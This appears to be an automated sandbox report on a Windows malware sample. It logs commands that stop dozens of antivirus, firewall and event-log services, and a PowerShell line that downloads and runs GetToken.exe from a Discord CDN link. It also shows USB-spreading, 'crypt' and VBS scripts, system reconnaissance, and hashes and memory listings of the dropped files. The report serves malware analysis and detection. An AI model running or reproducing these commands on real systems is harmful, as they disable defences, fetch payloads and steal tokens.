C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk1usb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk2usb.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\GetToken.exeGetToken.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y1⤵
-
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding1⤵
- Accesses Microsoft Outlook profiles
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD527b0f8bc25c423a48d7984322ff3404d
SHA194673f66f91087d84cfa240668df0a2d60c8fa75
SHA256d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
SHA51283d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912
-
C:\Users\Admin\Desktop\YcynNote.txtFilesize
640B
MD52cc58ae8bf7d3567c76eaa4255b9d6d2
SHA19e79c3d63fe9045377b2bc9e3b076c55b641af77
SHA256767731cff421a20ff59d9e1677b277c069c3eeb55ab2528e5dc7101a1254f448
SHA512696e20aaa75a767cfe81fbe46369877da2d252d9081a3959e6dd7184b1e2476da9b5fbdde197761897fc2504e955c4f294d3a1dfa12c95e843de91c91a55f983
-
C:\Users\Admin\Desktop\loveletter.vbsFilesize
495B
MD5900ead69492d80e48738921eca28b14f
SHA16b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA5128fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
C:\Users\Admin\Desktop\mail.vbsFilesize
488B
MD588ef4bc3f48eeb97aedadff8f3840980
SHA148e8167bef2562d902885a075f6190d269fd3d35
SHA256b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024
-
C:\Users\Admin\Desktop\spreadusb.cmdFilesize
140B
MD5591248610b25d51736f91c45f788cf6e
SHA1b810cf36ed55fa0ea44c2dafb273e2463fbbda56
SHA256cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1
SHA5120cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99
-
C:\Users\Admin\Documents\2b2crypt.cmdFilesize
138B
MD58a0e18e8c3724921943bd90e6070dc8e
SHA113ba409f261173c093918af6c786fe6d863164cf
SHA256ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6
SHA51254c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a
-
C:\Users\Admin\Documents\2b2crypt.m.cmdFilesize
142B
MD528057d0514c31373a5e6135b7b477196
SHA1719373c153c7a245bdcd6118330e38c15432eb20
SHA2563179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb
SHA51232952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596
-
C:\Users\Admin\Documents\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\NoKeyB.exeFilesize
1.2MB
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
C:\Users\Admin\Documents\NoKeyB.exeFilesize
1.2MB
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
C:\Users\Admin\Documents\Tokens.txtFilesize
22B
MD53d74b4a3f6053a5a252f4faee7fb157e
SHA1576c1a2892dad89c3b6aba698ee67258be827eaf
SHA256445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139
SHA512dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529
-
C:\Users\Admin\Documents\apps.txtFilesize
8KB
MD554d233cc9e2bbf4034df3da6e9c593e0
SHA13a8e977d9e481d6ffeb3d8a38a3509d9a4da68cc
SHA256de92216e0d295e216904fdb5aadfd4a979da395000ff7bf70f31c2c8df42096f
SHA512fc85b2a109effe64c76576f750711a992fac3d98db690bef596a43baf5fc318143d49a109f8a5afe68f2b1bf9c4521987ad612b062eb8744bfee7922ee02750d
-
C:\Windows\win.iniFilesize
640B
MD537a42188327ced5450bd8ef9b5a16bbe
SHA11f332e4ea66e55337808fb794b58ea4e182e1f19
SHA2564fb7375c44fab40f69801d65177027c52cdbb79fdcfb3a91d75c469f7fe0533d
SHA5123d0751688dc9026da234f1c61330782fbc20655ff8a810c2bf529db958e1d3fd3b9bce7d9e027edbe92c819b9074474e5e84775828a11721e9aeb05d85a0f363
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\Documents\NoKeyB.exeFilesize
1.2MB
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
memory/240-96-0x0000000000000000-mapping.dmp
-
memory/280-118-0x0000000000000000-mapping.dmp
-
memory/300-117-0x0000000000000000-mapping.dmp
-
memory/480-99-0x0000000000000000-mapping.dmp
-
memory/560-95-0x0000000000000000-mapping.dmp
-
memory/576-78-0x0000000000000000-mapping.dmp
-
memory/580-115-0x0000000000000000-mapping.dmp
-
memory/580-175-0x0000000001F04000-0x0000000001F07000-memory.dmpFilesize
12KB
-
memory/580-176-0x0000000001F0B000-0x0000000001F2A000-memory.dmpFilesize
124KB
-
memory/580-174-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmpFilesize
11.4MB
-
memory/588-127-0x0000000000000000-mapping.dmp
-
memory/612-73-0x0000000000000000-mapping.dmp
-
memory/612-121-0x0000000000000000-mapping.dmp
-
memory/628-122-0x0000000000000000-mapping.dmp
-
memory/780-98-0x0000000000000000-mapping.dmp
-
memory/832-84-0x0000000000000000-mapping.dmp
-
memory/840-76-0x0000000000000000-mapping.dmp
-
memory/876-93-0x0000000000000000-mapping.dmp
-
memory/912-56-0x0000000000000000-mapping.dmp
-
memory/912-61-0x00000000027FB000-0x000000000281A000-memory.dmpFilesize
124KB
-
memory/912-112-0x0000000000000000-mapping.dmp
-
memory/912-57-0x000007FEFBFF1000-0x000007FEFBFF3000-memory.dmpFilesize
8KB
-
memory/912-60-0x000000001B6E0000-0x000000001B9DF000-memory.dmpFilesize
3.0MB
-
memory/912-59-0x00000000027F4000-0x00000000027F7000-memory.dmpFilesize
12KB
-
memory/912-58-0x000007FEF3910000-0x000007FEF446D000-memory.dmpFilesize
11.4MB
-
memory/956-101-0x0000000000000000-mapping.dmp
-
memory/964-55-0x0000000000000000-mapping.dmp
-
memory/1036-94-0x0000000000000000-mapping.dmp
-
memory/1064-86-0x0000000000000000-mapping.dmp
-
memory/1072-83-0x0000000000000000-mapping.dmp
-
memory/1076-108-0x0000000000000000-mapping.dmp
-
memory/1108-105-0x0000000000000000-mapping.dmp
-
memory/1116-81-0x0000000000000000-mapping.dmp
-
memory/1180-85-0x0000000000000000-mapping.dmp
-
memory/1228-110-0x0000000000000000-mapping.dmp
-
memory/1308-75-0x0000000000000000-mapping.dmp
-
memory/1316-97-0x0000000000000000-mapping.dmp
-
memory/1324-185-0x000007FEF2780000-0x000007FEF32DD000-memory.dmpFilesize
11.4MB
-
memory/1324-186-0x00000000024A4000-0x00000000024A7000-memory.dmpFilesize
12KB
-
memory/1324-187-0x00000000024AB000-0x00000000024CA000-memory.dmpFilesize
124KB
-
memory/1336-92-0x0000000000000000-mapping.dmp
-
memory/1404-123-0x0000000000000000-mapping.dmp
-
memory/1488-182-0x000000006C7E1000-0x000000006C7E3000-memory.dmpFilesize
8KB
-
memory/1488-181-0x000000006CFF1000-0x000000006CFF3000-memory.dmpFilesize
8KB
-
memory/1488-180-0x0000000073A7D000-0x0000000073A88000-memory.dmpFilesize
44KB
-
memory/1488-179-0x0000000075DF1000-0x0000000075DF3000-memory.dmpFilesize
8KB
-
memory/1488-178-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1488-124-0x0000000000000000-mapping.dmp
-
memory/1488-177-0x0000000072A91000-0x0000000072A93000-memory.dmpFilesize
8KB
-
memory/1512-74-0x0000000000000000-mapping.dmp
-
memory/1528-54-0x0000000000000000-mapping.dmp
-
memory/1532-206-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmpFilesize
11.4MB
-
memory/1532-208-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1532-207-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1548-77-0x0000000000000000-mapping.dmp
-
memory/1548-125-0x0000000000000000-mapping.dmp
-
memory/1552-120-0x0000000000000000-mapping.dmp
-
memory/1584-87-0x0000000000000000-mapping.dmp
-
memory/1624-79-0x0000000000000000-mapping.dmp
-
memory/1632-193-0x0000000000AC0000-0x0000000000AC8000-memory.dmpFilesize
32KB
-
memory/1632-216-0x0000000002AD4000-0x0000000002AD7000-memory.dmpFilesize
12KB
-
memory/1632-217-0x0000000002ADB000-0x0000000002AFA000-memory.dmpFilesize
124KB
-
memory/1632-214-0x000007FEF2780000-0x000007FEF32DD000-memory.dmpFilesize
11.4MB
-
memory/1632-215-0x000000001B840000-0x000000001BB3F000-memory.dmpFilesize
3.0MB
-
memory/1632-219-0x000007FEECB60000-0x000007FEEDBF6000-memory.dmpFilesize
16.6MB
-
memory/1636-103-0x0000000000000000-mapping.dmp
-
memory/1672-113-0x0000000000000000-mapping.dmp
-
memory/1716-202-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/1716-200-0x000007FEF2780000-0x000007FEF32DD000-memory.dmpFilesize
11.4MB
-
memory/1716-203-0x000000000235B000-0x000000000237A000-memory.dmpFilesize
124KB
-
memory/1716-201-0x0000000002354000-0x0000000002357000-memory.dmpFilesize
12KB
-
memory/1720-104-0x0000000000000000-mapping.dmp
-
memory/1728-128-0x0000000000000000-mapping.dmp
-
memory/1736-197-0x000000000287B000-0x000000000289A000-memory.dmpFilesize
124KB
-
memory/1736-194-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmpFilesize
11.4MB
-
memory/1736-196-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/1740-80-0x0000000000000000-mapping.dmp
-
memory/1748-130-0x0000000000000000-mapping.dmp
-
memory/1752-109-0x0000000000000000-mapping.dmp
-
memory/1812-119-0x0000000000000000-mapping.dmp
-
memory/1812-71-0x00000000028BB000-0x00000000028DA000-memory.dmpFilesize
124KB
-
memory/1812-66-0x0000000000000000-mapping.dmp
-
memory/1812-69-0x000007FEF2F70000-0x000007FEF3ACD000-memory.dmpFilesize
11.4MB
-
memory/1812-70-0x00000000028B4000-0x00000000028B7000-memory.dmpFilesize
12KB
-
